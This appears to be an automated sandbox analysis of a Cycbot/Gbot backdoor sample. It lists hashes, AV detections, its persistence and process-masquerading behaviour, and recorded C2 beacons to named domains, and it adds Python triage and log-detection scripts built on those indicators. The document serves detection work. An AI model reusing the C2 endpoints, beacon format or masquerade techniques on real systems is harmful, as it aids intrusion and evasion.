Analysis Date: 2014-11-21 09:43:28
MD5: f7b03627730c05ad34711042dc8a2575
SHA1: ae12d99fd9438c109eba12bb66caaf9d02e7369d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text   md5: 2c8a27e06e9f01f7f857a2e1ecb1e27d  sha1: ec9046c2963128e8026e4861e8b86ab791aba474  size: 109568
Section .rdata  md5: f22545caaf6932c9d4fb37c1a25e80e5  sha1: 169197b93962d57419266712b7398e01d904c062  size: 1024
Section .data   md5: 2a534553cea90759e18c829440d8f777  sha1: ddf7a3afa84e9bf2bee5b74823654c6863a5b60d  size: 54784
Section .apexi  md5: a24195d0cc9d2f0e7a622aca79e7051f  sha1: 04dc024b2cc4ff5df51ccd0cd1ae452d894883ae  size: 1024  (non-standard section name)
Timestamp: 2005-09-12 06:27:21 (PE header compile time; attacker-controlled, not evidence of age)
Version: ProductVersion 1.0.0.3, FileVersion 1.0.0.3, PrivateBuild 1520
PEhash: fb80925a20301a0478da91e777f975904e96e46e
IMPhash: d0428affb5a34dc8bb398555e7302481
AV results (vendor, detection name):
360 Safe                       Gen:Trojan.Heur.KS.1
Ad-Aware                       Gen:Trojan.Heur.KS.1
Alwil (avast)                  Cybota [Trj]
Arcabit (arcavir)              no_virus
Authentium                     W32/Goolbot.G.gen!Eldorado
Avira (antivir)                BDS/Gbot.aida
BullGuard                      Gen:Trojan.Heur.KS.1
CA (E-Trust Ino)               Win32/Diple.A!generic
CAT (quickheal)                Backdoor.Cycbot.B
ClamAV                         Trojan.Gbot-1240
Dr. Web                        BackDoor.Gbot.21
Emsisoft                       Gen:Trojan.Heur.KS.1
Eset (nod32)                   Win32/Cycbot.AF
Fortinet                       W32/Gbot.B!tr.bdr
Frisk (f-prot)                 W32/Goolbot.G.gen!Eldorado
F-Secure                       Gen:Trojan.Heur.KS.1
Grisoft (avg)                  Win32/Heri
Ikarus                         Backdoor.Win32.Gbot
K7                             Backdoor ( 003210941 )
Kaspersky                      Trojan.Win32.Generic
MalwareBytes                   Trojan.Agent
Mcafee                         BackDoor-EXI.gen.i
Microsoft Security Essentials  Backdoor:Win32/Cycbot.G
MicroWorld (escan)             Gen:Trojan.Heur.KS.1
Rising                         no_virus
Sophos                         Mal/FakeAV-IS
Symantec                       Backdoor.Cycbot!gen3
Trend Micro                    BKDR_CYCBOT.SMX
VirusBlokAda (vba32)           Trojan.Jorik.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: pdadatarestore.com
Winsock DNS: 127.0.0.1
Winsock DNS: realsoftwaredevelopment.com
Winsock DNS: hostinganddedic.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe
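The runtime behaviour above (system-process names dropped into Application Data and Temp, the HKCU ...\Windows\Load autostart, ProxyEnable flipped to 1, the GUID mutexes, and the "start <path>%<dir>" self-relaunch) is what a host-side triage script should key on. The following is an added example, not part of the sandbox report: the snapshot is constructed to mirror this run, the field and function names are hypothetical, and on a real host the same data would come from Sysmon, an EDR export or a memory image.

```python
"""
Host-side triage keyed to the Runtime Details of this run (added example,
not part of the sandbox report). SAMPLE_SNAPSHOT is constructed to mirror
the report; function and field names are hypothetical.
"""
import ntpath
import re

# Binaries that only ever run from the Windows system directory. A copy under
# a user-writable path is masquerading. On the XP guest used in this run
# (NT 5.1 in the User-Agent) dwm.exe and conhost.exe do not exist at all:
# they were introduced in Vista and Windows 7 respectively.
SYSTEM_ONLY = {"csrss.exe", "dwm.exe", "conhost.exe", "svchost.exe",
               "lsass.exe", "winlogon.exe", "services.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# The two registry values the sample wrote (from the report). The 'Load'
# value is a legitimate but almost never used per-user autostart.
LOAD_VALUE = r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load"
PROXY_ENABLE = r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable"

# GUID-style mutexes from the report (the c:!...! ones are WinInet's own).
KNOWN_MUTEXES = {
    "{4D92BB9F-9A66-458f-ACA4-66172A7016D4}",
    "{61B98B86-5F44-42b3-BCA1-33904B067B81}",
    "{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}",
    "{B37C48AF-B05C-4520-8B38-2FE181D5DC78}",
}

# The sample relaunches itself as "<exe> start<path>.exe%<dir>". The report
# shows 'start' fused to the path, so the pattern tolerates a missing space.
RELAUNCH_RE = re.compile(r"\bstart\s*([A-Za-z]:\\.*?\.exe)%", re.I)


def masquerading(image):
    """True if a system-only binary name runs outside the system directory."""
    name = ntpath.basename(image).lower()
    return name in SYSTEM_ONLY and not image.lower().startswith(SYSTEM_DIRS)


def triage(snapshot):
    """Return (kind, detail) findings for a host snapshot."""
    findings = []
    for p in snapshot["processes"]:
        if masquerading(p["image"]):
            findings.append(("masquerade", p["image"]))
        m = RELAUNCH_RE.search(p["cmdline"])
        if m:
            findings.append(("self-relaunch", m.group(1)))
    reg = {k.lower(): v for k, v in snapshot["registry"].items()}
    load = reg.get(LOAD_VALUE.lower())
    if load:
        findings.append(("persistence", load))
    if str(reg.get(PROXY_ENABLE.lower())) == "1":
        # Pair this with the ProxyServer value on a real host; the report
        # only records the enable flag being set.
        findings.append(("proxy-enabled", PROXY_ENABLE))
    for mtx in snapshot["mutexes"]:
        if mtx in KNOWN_MUTEXES:
            findings.append(("known-mutex", mtx))
    return findings


# Constructed snapshot mirroring the report, plus one benign control process.
SAMPLE_SNAPSHOT = {
    "processes": [
        {"image": r"C:\malware.exe", "cmdline": r"C:\malware.exe"},
        {"image": r"C:\malware.exe",
         "cmdline": r"C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data"},
        {"image": r"C:\malware.exe",
         "cmdline": r"C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft"},
        {"image": r"C:\Documents and Settings\Administrator\Application Data\dwm.exe",
         "cmdline": r"C:\Documents and Settings\Administrator\Application Data\dwm.exe"},
        {"image": r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe",
         "cmdline": r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe"},
        {"image": r"C:\WINDOWS\system32\csrss.exe",   # benign control
         "cmdline": r"C:\WINDOWS\system32\csrss.exe"},
    ],
    "registry": {
        LOAD_VALUE: r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe",
        PROXY_ENABLE: 1,
    },
    "mutexes": ["{4D92BB9F-9A66-458f-ACA4-66172A7016D4}", "WininetConnectionMutex"],
}

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_SNAPSHOT):
        print(f"{kind:14} {detail}")
```

The path check is deliberately by directory rather than by hash: the dropped copies are new files, so hash IoCs miss them, but a csrss.exe, dwm.exe or conhost.exe under a user profile is wrong on any Windows version.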

Network Details:

DNS: realsoftwaredevelopment.com  Type: A  104.28.9.83
DNS: realsoftwaredevelopment.com  Type: A  104.28.8.83
DNS: zonetf.com  Type: A  141.8.225.80
DNS: zonetf.com  Type: A  141.8.225.80
DNS: hostinganddedic.com  Type: A  (no address recorded)
DNS: pdadatarestore.com  Type: A  (no address recorded)
HTTP GET: http://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v75=22&tq=gKZEtzyd6jYfK2dVTdhZWnLFWaW1NanPeNdBL9pKo%2Bg8PQOAWGOa%2BoYutXZEevJIYy5VcirzjundIRLIB4jiTj5XGNvaXPKiuCRzPkXeU8VLbB7285I4%2BeZIKF%2BBfCTmIGOjLKUVkxRNyoHRvRmklieIfHxAePMaOFXt5dLg5TErzOXiCKlvy2wevbug9%2FcIpJVa%2FljF9qVuI7RversgMk4VhJdnias4%2FYvxGqFOXAtdY2gCp7k%2FayeycYof2ojw57O620YCubzAKIqjND0VGpJ%2FKS0Qhwq6A6a%2B3KFqsEQgI5YYwLFo3RiES9sBM8oe7d6Ey20N4DsE5RRr8a%2FDVyQHch16dSGiRsXVN%2BMz6gu0FX%2BkX6JrIT8SQI6D%2B7sQsuY3
  User-Agent: mozilla/2.0
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxL5ygm1C4lKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 104.28.9.83:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
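The traffic above has several features worth turning into detection logic: a long base64-looking `tq` parameter on every request, an obsolete `mozilla/2.0` User-Agent on the GET, a query of several hundred characters attached to what claims to be a static .gif, and three POSTs whose `tq` values share a long identical prefix before diverging (which points to a fixed header in front of the encrypted payload). The following is an added example and not part of the sandbox report: the proxy-log format, thresholds and function names are assumptions; the URLs and User-Agents are the ones recorded above, plus one constructed benign control line.

```python
"""
Detection logic for the beaconing recorded in this run, applied to
constructed proxy-log lines (added example, not part of the sandbox report).
Log format, thresholds and function names are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumed log format: <timestamp> <client> <method> <url> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (GET|POST) (\S+) "([^"]*)"$')
B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')

C2_HOSTS = {"zonetf.com", "realsoftwaredevelopment.com"}  # from the report
MIN_BLOB = 64      # base64 chars before a parameter counts as an opaque blob
PREFIX_LEN = 32    # leading chars that must repeat to suggest a fixed header
IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png")


def parse_line(line):
    """Split one log line into a request dict; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, client, method, url, ua = m.groups()
    u = urlsplit(url)
    return {"ts": ts, "client": client, "method": method, "host": u.hostname,
            "path": u.path, "query": u.query,
            "params": parse_qs(u.query, keep_blank_values=True), "ua": ua}


def classify(req):
    """Per-request reasons, independent of any other request."""
    reasons = []
    if req["host"] in C2_HOSTS:
        reasons.append("known C2 host")
    tq = req["params"].get("tq", [""])[0]
    if len(tq) >= MIN_BLOB and B64_RE.match(tq):
        reasons.append("opaque base64 'tq' parameter (%d chars)" % len(tq))
    m = re.match(r"^mozilla/(\d+)\.", req["ua"], re.I)
    if m and int(m.group(1)) < 4:
        reasons.append("obsolete User-Agent %r" % req["ua"])
    if (req["method"] == "GET" and req["path"].lower().endswith(IMAGE_EXT)
            and len(req["query"]) >= 200):
        reasons.append("long query on a static image path")
    return reasons


def tq_prefix_groups(reqs):
    """Index requests by (host, first PREFIX_LEN chars of tq); keep groups of 2+.
    Different blobs sharing a long prefix suggest a static header (bot id,
    campaign tag) ahead of the encrypted body."""
    groups = defaultdict(list)
    for i, r in enumerate(reqs):
        tq = r["params"].get("tq", [""])[0]
        if len(tq) >= PREFIX_LEN:
            groups[(r["host"], tq[:PREFIX_LEN])].append(i)
    return {k: v for k, v in groups.items() if len(v) >= 2}


def detect(lines):
    """Map 1-based line number -> list of reasons, for lines with any hit."""
    parsed = [(n, parse_line(l)) for n, l in enumerate(lines, 1)]
    parsed = [(n, r) for n, r in parsed if r]
    hits = {n: classify(r) for n, r in parsed}
    for (host, prefix), members in tq_prefix_groups([r for _, r in parsed]).items():
        for idx in members:
            hits[parsed[idx][0]].append(
                "tq prefix %s... repeated %d times to %s" % (prefix[:8], len(members), host))
    return {n: rs for n, rs in hits.items() if rs}


# Constructed log: the four requests from the report plus a benign control.
IE6 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
SAMPLE_LOG = [
    '2014-11-21T09:44:01 192.168.1.1 GET http://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v75=22&tq=gKZEtzyd6jYfK2dVTdhZWnLFWaW1NanPeNdBL9pKo%2Bg8PQOAWGOa%2BoYutXZEevJIYy5VcirzjundIRLIB4jiTj5XGNvaXPKiuCRzPkXeU8VLbB7285I4%2BeZIKF%2BBfCTmIGOjLKUVkxRNyoHRvRmklieIfHxAePMaOFXt5dLg5TErzOXiCKlvy2wevbug9%2FcIpJVa%2FljF9qVuI7RversgMk4VhJdnias4%2FYvxGqFOXAtdY2gCp7k%2FayeycYof2ojw57O620YCubzAKIqjND0VGpJ%2FKS0Qhwq6A6a%2B3KFqsEQgI5YYwLFo3RiES9sBM8oe7d6Ey20N4DsE5RRr8a%2FDVyQHch16dSGiRsXVN%2BMz6gu0FX%2BkX6JrIT8SQI6D%2B7sQsuY3 "mozilla/2.0"',
    '2014-11-21T09:44:03 192.168.1.1 POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D "' + IE6 + '"',
    '2014-11-21T09:44:05 192.168.1.1 POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G "' + IE6 + '"',
    '2014-11-21T09:44:07 192.168.1.1 POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxL5ygm1C4lKv975Xlm5G "' + IE6 + '"',
    '2014-11-21T09:44:10 192.168.1.1 GET http://www.example.com/index.html "' + IE6 + '"',
]

if __name__ == "__main__":
    for n, reasons in sorted(detect(SAMPLE_LOG).items()):
        print(n, "; ".join(reasons))
```

The host list alone would catch this sample only until the domains rotate; the structural checks (opaque blob, repeated prefix, oversized query on an image, pre-4.0 User-Agent) are the ones that survive a domain change, and the prefix grouping needs the per-host view that a single-request rule cannot give.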

Strings:
T0
..y7
.....
.
.E...o....B=..U..0...t..)...1..U
$.S
.W
.G....
F.
E..z
..
..W..'k....@.Alr...c.
_'
.
.x
.
...
.R...ef...k...5
.'I.
_
&
.
031Bq
040904b0
0sWV
1.0.0.3
1520
!DPS
FFV0
FileVersion
jjjjjj
p2P;
PrivateBuild
ProductVersion
`r`E
!sqc
StringFileInfo
`sWQ
TIMES NEW ROMAN
Translation
U`b`
VarFileInfo
VS_VERSION_INFO
03!8GR
0FgB*o
0jd%	'
0n@n>G
4 ,K>	
4"s94W
597`qE
5}Vr]5
)6hO-Q
@6#%v;
77]A]2WL
=8{<e<
8E?Dk@
8-}gzA
8IJZ&^
,\.8`Z
9',(3^
_95kDv
+$[<#a
A)bFx;
.apexi
 =aRxm
>!.c1H
C+GzpY
CheckRemoteDebuggerPresent
CreateWindowExW
CT=fK6
CtSG/"
C_V[uQ
"-<D3'3
@.data
DocumentPropertiesW
d+Zmup
EndDialog
EnumResourceTypesW
ER')EV
Eyf.&nH
f*"/}$
F)80OJc
\Fdd$t\
*fH/ve
fI	?<y
[\FSi;
GetAncestor
GetFileType
GetStartupInfoA
GetWindowInfo
GSjhRrM
huCPVG?#
IAmI,1Kd
'IkEq-
|imp.X
#In!??
InitializeCriticalSection
i%_o%1
I"@"+<t
IWT+"yGw
<j	+{&
_,j/[ 
j}fKe:
JI5-p4
J_im5Q
,)jnhR
J{Op;u
.k*AOz
KERNEL32.dll
;kmh{P
k\yxep
L*Mbjlua
LoadCursorW
lstrcpynW
+/<LT3v
ly-}'c
MessageBoxW
m[MwhV
@Mv.Sb
/mx'/[eL
,mZ-{OL
N9FV-~
Njumu"
N?k%8B
Nl28Lzi 2
o0P}e	
O$!:H&?]|1
oh^;`y
|OJsR<M*oO
@o	N|M
{Oq,WA
<o,Y}Hl8
p6KoK4
p8=Y6<
`_}`Pf
pRW;~<
QmU;(o
rAYW_qp
`.rdata
RegisterClassExW
R`GO"Q
!|rUP?5
rXMtZ,1:
S$'})5l
'$SD\A
*s!EbP
sG6k9B>~<:
Sk><ni
sl$~:E
SMX!{lQ
<s="ur
Te3oI<
teyrkK/
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T:oR7{
u_0KTCG
udIN6i
u-]}=E
USER32.dll
,<U$xHF
_vRy_&
vwhu0Fh
(W)~htr
WINSPOOL.DRV
W?LT<^
<-\'?)wP
wtoALAmI,
X-2]@-{9jmc
X2Gf*~
X.&('A
XLN]yGH
XLr{h1
Y4O$%"
ydh|Vn
(Y}~u>kP
*zj4q+
zkCX+>